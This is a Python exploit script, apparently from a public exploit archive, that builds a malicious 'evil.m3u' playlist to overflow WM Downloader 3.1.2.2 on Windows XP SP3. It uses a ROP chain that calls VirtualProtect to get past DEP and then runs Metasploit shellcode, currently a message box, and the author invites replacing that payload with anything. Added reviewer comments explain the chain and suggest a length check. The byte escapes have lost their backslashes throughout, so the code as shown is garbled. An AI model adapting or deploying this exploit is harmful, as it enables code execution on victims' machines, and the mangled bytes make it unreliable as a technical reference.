WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow / DEP Bypass
Posted on 29 January 2011
#!/usr/bin/env python
# WM Downloader 3.1.2.2 2010.04.15 (.m3u) Buffer Overflow + DEP Bypass
# Author: sickness
# Download : http://mini-stream.net/wm-downloader/
# Tested : Windows XP Professional SP3 (EN) latest updates with IE8 and IE7
# DATE : 29/01/2011
###################################################################
# You might need to change the offset.
# The payload can be replaced with whatever you want, there is enough space.
###################################################################
#
# Reviewer notes (defender's reading of the script below):
#   The script writes a single file, evil.m3u: an "#EXTM3U" playlist whose
#   one entry is an "http://" URL padded to roughly 17 KB, followed by the
#   `eip` value, a ROP chain (`rop`, `vp`, `rop2`), a NOP sled (`nops`),
#   the `sc` payload and trailing padding (`rest`).  Per the author's
#   gadget comments the chain builds a VirtualProtect() call frame in
#   place (`vp` holds placeholder arguments; the
#   MOV DWORD PTR [ESI+20/24/28] gadgets fill them in) so the payload
#   region becomes executable despite DEP, then transfers control into
#   the sled.  The payload is msfpayload's windows/messagebox (see the
#   comment above `sc`), i.e. a message box.
#   Every gadget and API address is a fixed constant, so the chain only
#   matches the XP SP3 module set named above; systems whose modules load
#   at other (e.g. randomized) addresses do not share these constants.
#
# Detection / mitigation hint grounded in the file content:
#   A playlist entry tens of kilobytes long is far outside any real URL;
#   a bounded-length check in the playlist parser, and the same check in
#   content inspection of .m3u files, catches this class of input.
#
# NOTE(review): throughout this listing the escapes read 'x90', 'x41',
# 'x1Ex17x80x7C' etc. — three ASCII characters per "byte" — rather than
# '\xNN' byte escapes, presumably lost in extraction.  The lengths and
# bytes the code writes therefore differ from what the gadget comments
# describe.  Also left as the author wrote them: Python 2 print
# statements, the unused `import sys`, the builtin-shadowing name `file`,
# and the open()/write()/close() sequence with no `with` block.
import sys

# Playlist header, then the oversized entry that triggers the overflow.
header='#EXTM3U '
junk ='http://'+'x90' * 17400
junk+='x41'*17
# Four bytes that, per the comment, land on a saved return address.
eip ='x1Ex17x80x7C' # RETN
junk2='x41x41x41x41'
# First chain: capture the stack pointer into EAX/ESI for later writes.
rop ='x77x92xD7x5A' # PUSH ESP # MOV EAX,EDX # POP EDI # RETN
rop+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop+='x41x41x41x41' # POP EBP
rop+='xBBxA5x72x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop+='x41x41x41x41' # POP EBP
rop+='x94x28xC2x77' # ADD ESP,20 # POP EBP # RETN
rop+='x41x41x41x41' # RETN 4
rop+='x41x41x41x41' # POP EBP
# VirtualProtect() call frame; the WWWW/XXXX/YYYY/ZZZZ placeholders are
# overwritten by the MOV DWORD PTR [ESI+..] gadgets in rop2 below.
vp ='xD4x1Ax80x7C' # VirtualProtect()
vp+='WWWW' # SC
vp+='XXXX' # SC
vp+='YYYY' # Size
vp+='ZZZZ' # Policy
vp+='xD0x23x10x5D' # Writable Memory
vp+='x41x41x41x41' # Compensate ADD ESP,20
vp+='x41x41x41x41' # Compensate ADD ESP,20
# Second chain: compute the frame arguments in EAX and store them.
rop2 ='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x1FxC1xDDx73' # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN
rop2+='x41x41x41x41' # POP ESI
rop2+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xBBxA5x72x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xF5xD7xC1x77' # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xCFx43xDDx73' # MOV DWORD PTR DS:[ESI+24],EAX # POP ESI # RETN
rop2+='x41x41x41x41' # POP ESI
rop2+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xBBxA5x72x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='xC3xA9xE5x73' # XOR EAX,EAX # POP EBP # RETN
rop2+='x41x41x41x41' # RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x2BxECxC4x77' # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x46x21xE1x73' # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN
rop2+='x41x41x41x41' # POP ESI
rop2+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='xBBxA5x72x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='xC3xA9xE5x73' # XOR EAX,EAX # POP EBP # RETN
rop2+='x41x41x41x41' # RETN 4
rop2+='x41x41x41x41' # POP EBP
rop2+='x1DxECxC4x77' # ADD EAX,40 # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x1Dx7Dx15x77' # INC ESI # RETN
rop2+='x1Dx7Dx15x77' # INC ESI # RETN
rop2+='x1Dx7Dx15x77' # INC ESI # RETN
rop2+='x1Dx7Dx15x77' # INC ESI # RETN
rop2+='x46x21xE1x73' # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN
rop2+='x41x41x41x41' # POP ESI
rop2+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41' # POP EBP
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73' # ADD EAX,4 # RETN
# Pivot the stack onto the prepared frame so the next RETN enters it.
rop2+='xB1x9Cx5Cx75' # PUSH EAX # POP EBP # RETN 4
rop2+='x26x25xAAx71' # MOV ESP,EBP # POP EBP # RETN
rop2+='x41x41x41x41' # RETN 4
rop2+='x41x41x41x41' # POP EBP

# Payload: a message box generated by the Metasploit command below.
# Adjacent string literals are concatenated by the Python parser.
# msfpayload windows/messagebox TITLE=OWNED TEXT="Feel the pwnsauce." R | msfencode -a x86 -b 'x00x0ax0dx20x25x09' -t c
sc = ("xd9xe5xd9x74x24xf4x5dxb8xe9xf2x97x0fx29xc9xb1"
"x43x31x45x18x03x45x18x83xedx15x10x62xd6x0ex4e"
"x54x9dxf4x85x56x8cx46x12xa8xf9xc2x56xbbxc9x81"
"x1fx30xa1xe3xc3xc3xf3x03x77xadxdbx98xb1x6ax53"
"x86xc8x79x32xb7xe3x81x24xd7x88x12x83x33x04xaf"
"xf7xb0x4ex18x70xc7x84xd3xcaxdfxd3xbexeaxdex08"
"xddxdfxa9x45x16xabx28xb4x66x54x1bx88x75x06xdf"
"xc8xf2x50x1ex07xf7x5fx67x73xfcx5bx1bxa0xd5xee"
"x02x23x7fx35xc5xdfxe6xbexc9x54x6cx9axcdx6bx99"
"x90xe9xe0x5cx4fx78xb2x7ax93x1bxf8x31xa3xf2x2a"
"xbcx51x8dx11xd7x17xc3x9bxc4x7ax33x3cxebx84x3c"
"xcax51x7fx79xb3x81x9dx0excbx2ex46xa2x3bxc0x79"
"xbdx43x54xc0x49xd4x0bxa7x69x65xbcx04x5bx4bx58"
"x03xeexe0xc5xa1x98x5bx22x4cx11x85x7cxafx74x4e"
"x08x8dx26xf5xa2xb0x8bxb5x34xa8x37x94xd2xb0xc8"
"xe7xdcx5bx72x40x03xbcx12x3fx14xf2xa7x8ex41x82"
"x7bxd5x70x1ax60x7dx1ex32x3ex5ex88x39xdfxebx2b"
"xd6x3fx64xdbx48x57xa4x57xfdxc2xccxd1x98x69x61"
"xefxabxf9x35x2bx3ex70x24x02xecxd0xf4x34x42x2b"
"x2ax87xa2x83x34xbdx2a")
# NOP sled ahead of the payload and padding after it.
nops = 'x90' * 150
rest = 'x90' * 3600

# Assemble the playlist in this exact order and write it to disk.
exploit =header+junk+eip+junk2+rop+vp+rop2+nops+sc+rest
file = open('evil.m3u','w')
file.write(exploit)
file.close()
print 'Writing file, please wait ... '
print 'Done!'